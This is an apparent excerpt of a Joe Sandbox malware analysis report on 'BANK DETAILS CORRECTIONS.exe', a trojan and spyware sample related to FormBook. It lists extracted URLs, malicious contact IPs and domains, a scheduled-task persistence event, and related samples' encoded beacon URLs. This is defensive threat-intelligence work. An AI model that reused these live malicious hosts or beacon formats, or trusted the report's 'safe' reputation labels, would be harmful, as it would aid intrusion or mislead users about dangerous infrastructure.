                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://zspo.sf3l2.top/0ie1ye/vlc52d.htmsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 0000000D.00000002.1361939859.00000000028EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.oc7o0.top/e8miho/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://osmfn1.djzcz.top/ipb/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.oc7o0.top/ik0/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ijg.oc7o0.top/7a85xk/ua98sk.htmsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.oc7o0.top/4d7o8gx/wpst3.pptsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://1mt8.ss1yp.top/g9sb/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://g77.8v089.top/damu1/pl7.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://4mt4jb.ko6sc.top/6d92ec/oicfh3p.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://hzw.avt.temporary.site/wp-content/themes/flash/css/font-awesome.min.css?ver=6.4.3sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.oc7o0.top/sw1bs0t/qq05.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://dnp53gn.ss1yp.top/f9qm/5bqu.pptxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://f8subyg.x37kb.top/0nln/o72.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_7397d1bd83edde12ad6703sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://mozilla.org0/sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.oc7o0.top/l1qnt/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://xr3f3p.1cva0.top/n1qm0f/kn1v2.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-192x192.jpgsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.oc7o0.top/aek2/l7bry89.htmlsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://83zj4.d2um5.top/x88q/sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.4.3sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://usqzg3b.s0kfn.top/q7gyjwg/roc.xlssdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://q5cjh4.7fwhx.top/wd5qx9/sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-32x32.jpgsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://schema.orgsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://5hm.u3gee.top/u4g28a/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.ecosia.org/newtab/sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bzem8k.8kb9n.top/umcbim/nf2.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://hzw.avt.temporary.site/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://h8w.soaw8.top/mthsy3w/eonaph.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://8j3my.stgu5.top/322/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.oc7o0.top/2r7b/mulenc.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://ua01qg.jsj91.top/b8pu1ee/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://lxoo4j.laoli666.top/2e0w/xted.htmlsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUIsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?vesdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://xajg3.mmdb8.top/ji0/b0kf5r.xlssdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.oc7o0.top/7fdwd/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.roblesprats.comEnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://dof.nqku1.top/7f7/67mxw.xlssdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d17ced.6imvv.top/nutmwu9/mie.docxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://is4ml0.2xexb.top/z07/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            192.64.119.184
                                                                            		www.605alibahis.comUnited States
                                                                            		22612NAMECHEAP-NETUStrue
                                                                            87.236.19.107
                                                                            		www.pro-ecoproduct.comRussian Federation
                                                                            		198610BEGET-ASRUtrue
                                                                            66.29.152.141
                                                                            		www.nikazo.xyzUnited States
                                                                            		19538ADVANTAGECOMUStrue
                                                                            103.197.25.241
                                                                            		dxgsf.shopHong Kong
                                                                            		55933CLOUDIE-AS-APCloudieLimitedHKtrue
                                                                            64.190.62.22
                                                                            		www.hondamechanic.todayUnited States
                                                                            		11696NBS11696UStrue
                                                                            47.76.88.64
                                                                            		xiaoyue.zhuangkou.comUnited States
                                                                            		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZtrue
                                                                            144.76.75.181
                                                                            		appmystartup.comGermany
                                                                            		24940HETZNER-ASDEtrue
                                                                            104.21.63.135
                                                                            		www.oc7o0.topUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            49.0.230.183
                                                                            		www.mgn.icuMongolia
                                                                            		38818YOKOUNANET-MN-AS-APYOKOZUNANETLLCMNtrue
                                                                            50.6.160.34
                                                                            		syscomputerrd.infoUnited States
                                                                            		46606UNIFIEDLAYER-AS-1UStrue
                                                                            149.88.64.51
                                                                            		vhs.zhaxiyun.comUnited States
                                                                            		188SAIC-ASUStrue
                                                                            208.91.197.132
                                                                            		www.roblesprats.comVirgin Islands (BRITISH)
                                                                            		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                            154.7.21.55
                                                                            		www.supportstuiwords.comUnited States
                                                                            		174COGENT-174UStrue
                                                                            89.31.143.90
                                                                            		www.le-kuk.shopGermany
                                                                            		15598QSC-AG-IPXDEtrue

                                                                            General Information

                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                            Analysis ID:1411001
                                                                            Start date and time:2024-03-18 14:44:45 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 12m 23s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:28
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:3
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:BANK DETAILS CORRECTIONS.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@25/16@17/14
                                                                            EGA Information:
                                                                            • Successful, ratio: 80%
                                                                            HCA Information:
                                                                            • Successful, ratio: 93%
                                                                            • Number of executed functions: 226
                                                                            • Number of non-executed functions: 273
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • VT rate limit hit for: BANK DETAILS CORRECTIONS.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            14:45:33API Interceptor1x Sleep call for process: BANK DETAILS CORRECTIONS.exe modified
                                                                            14:45:35Task SchedulerRun new task: fcLfLlfpmjf path: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                            14:45:35API Interceptor37x Sleep call for process: powershell.exe modified
                                                                            14:45:39API Interceptor1x Sleep call for process: fcLfLlfpmjf.exe modified
                                                                            14:46:27API Interceptor10113758x Sleep call for process: sdiagnhost.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            192.64.119.184arm.elfGet hashmaliciousUnknownBrowse
                                                                              arm7.elfGet hashmaliciousMiraiBrowse
                                                                                x86.elfGet hashmaliciousUnknownBrowse
                                                                                  87.236.19.107SecuriteInfo.com.Variant.Lazy.487114.22589.2790.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.pro-ecoproduct.com/e368/
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.pro-ecoproduct.com/e368/
                                                                                  Swift Copy.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.pro-ecoproduct.com/e368/?4zGh1=SuW14oMrBIWiwopbsk+MLEtBSHCOaZgUesr57Wy3OWovetoPxjpHPnXLNalogi/6/sRAUB2WjNquvASuAfx57xOLY7nf9dqTvEUHN7RryRCSTXyNFg==&tZ2=frALNJg
                                                                                  SecuriteInfo.com.MSIL.Remcos.GWMJE.tr.2177.15379.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.pro-ecoproduct.com/e368/
                                                                                  New Purchase Order.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.pro-ecoproduct.com/e368/
                                                                                  SecuriteInfo.com.MSIL.Stealer.36680.tr.14329.14038.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.pro-ecoproduct.com/e368/
                                                                                  rproformainvoice.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.pro-ecoproduct.com/e368/
                                                                                  Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.pro-ecoproduct.com/e368/
                                                                                  66.29.152.141Shipping Documents.com.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.nikazo.xyz/0mbu/
                                                                                  103.197.25.241SecuriteInfo.com.Variant.Lazy.487114.22589.2790.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.dxgsf.shop/e368/
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.dxgsf.shop/e368/
                                                                                  Swift Copy.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.dxgsf.shop/e368/?4zGh1=MPU+kkSLVmNlE6BiFT4mStbCjEKUAEZIJueR/SB7iQamDznHT5GXcmHCl6vfHo2zl4dcbern6KprCOm8xLfDENXjsTNhGfQNOgUvcBK1K3vunqnepA==&tZ2=frALNJg
                                                                                  SecuriteInfo.com.MSIL.Remcos.GWMJE.tr.2177.15379.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.dxgsf.shop/e368/
                                                                                  New Purchase Order.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.dxgsf.shop/e368/
                                                                                  SecuriteInfo.com.MSIL.Stealer.36680.tr.14329.14038.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.dxgsf.shop/e368/
                                                                                  rproformainvoice.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.dxgsf.shop/e368/
                                                                                  Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.dxgsf.shop/e368/
                                                                                  64.190.62.22gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.hofiw.link/m8cr/
                                                                                  PO 1402-16 AH.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.hofiw.link/e25x/
                                                                                  Quotation MEW Tender 2024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.hofiw.link/e25x/
                                                                                  N270-10-MR-1671-01.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.hofiw.link/e25x/?tRA0=tM2I0kWwJpmI1gvh2ziRgulAGfrSmNNme/g1aLRv0BAGcmUJuFrGyN1PpYtShWhjjEdQbEdN7PtVdLCsKg8pCMZNrEi3G37oVErMKD9DerdBGRle+Q==&yxB=0VxDV8
                                                                                  Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.nurse-job2535.life/m9so/
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.23163.28978.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.moving-companiesnearme02.life/cz30/?2d=Ro+nQSmqWHLW5WH/bsPGixaJTdhCoL5g4fg7fJ4tJLJNemeYAth0rz1pkeG22DrjnCY8&8p=ZVfhutOpl
                                                                                  ONbKLCjIMD.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.medical-loan24.live/m858/?GHU=IsVLP75BXPV29irb7QUBT0f93P2nzsiWNaG7Z6nH6v/C9T4Z/rVV4+geNHA05yDya3IUff47iHu4NOYvgxXa6bOwMihONn0chQ==&4zYHf=etbLLDsh728tzZo
                                                                                  v3Pk16a5xJ.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.porter-20.online/iskm/?qvqLkP=gmjY5TCX3TIjWCvmH7SgO463r2WxKfvCM467Q/hDmyqQSDpQlbHjhjGKaca6XATiaz6ZkNJGw/PBTsG+Uqk+k5kf4wXNNX97cA==&PDq4=L4NhCxe0UD
                                                                                  WWQQ.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.baricitinib8.live/gc3h/?a6=_va4kH0PG&CLY0_N=34GhycLPdSIdlo+gQAdvsajIpU9qwXy9dTPeiTTHo/E7kHuE6xWuNXiH+/aEqANJFxP/DQFEOPZcAkp9ozNzCFQseatNqO3Aiw==
                                                                                  DFFF.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                  • www.baricitinib8.live/gc3h/?GN9=34GhycLPdSIdlo+gQAdvsajIpU9qwXy9dTPeiTTHo/E7kHuE6xWuNXiH+/aEqANJFxP/DQFEOPZcAkp9ozNzCFQseatNqO3Aiw==&d81=ZhATkXfxPBvHAvo

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.pro-ecoproduct.comSecuriteInfo.com.Variant.Lazy.487114.22589.2790.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  Swift Copy.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  SecuriteInfo.com.MSIL.Remcos.GWMJE.tr.2177.15379.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  New Purchase Order.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  SecuriteInfo.com.MSIL.Stealer.36680.tr.14329.14038.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  rproformainvoice.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  www.nikazo.xyzShipping Documents.com.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 66.29.152.141
